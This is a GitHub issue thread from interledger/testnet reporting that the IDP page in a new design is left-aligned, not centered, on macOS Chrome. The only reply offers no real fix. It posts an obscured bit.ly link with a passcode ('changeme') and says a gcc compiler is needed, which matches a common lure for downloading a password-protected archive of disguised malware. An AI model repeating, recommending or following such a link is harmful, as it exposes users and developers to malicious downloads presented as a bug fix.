### ISSUE TITLE
[BUG] IDP page is not centered

### ISSUE THREAD

**Issue by Tymmmy** [interledger/testnet#1551]
### Steps to reproduce

1. Go to Boutique and make a purchase
2. The IDP page - new design - is not centered

### Expected result

The IDP page should be centered for the new design layout

### Actual result

The IDP page is centered to the left

### Screenshots or videos

<img width="1455" alt="image" src="https://github.com/user-attachments/assets/444fd41e-e11c-4a67-a6e9-c09a66854938">

### Operating system

macOS

### Browsers

Chrome

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
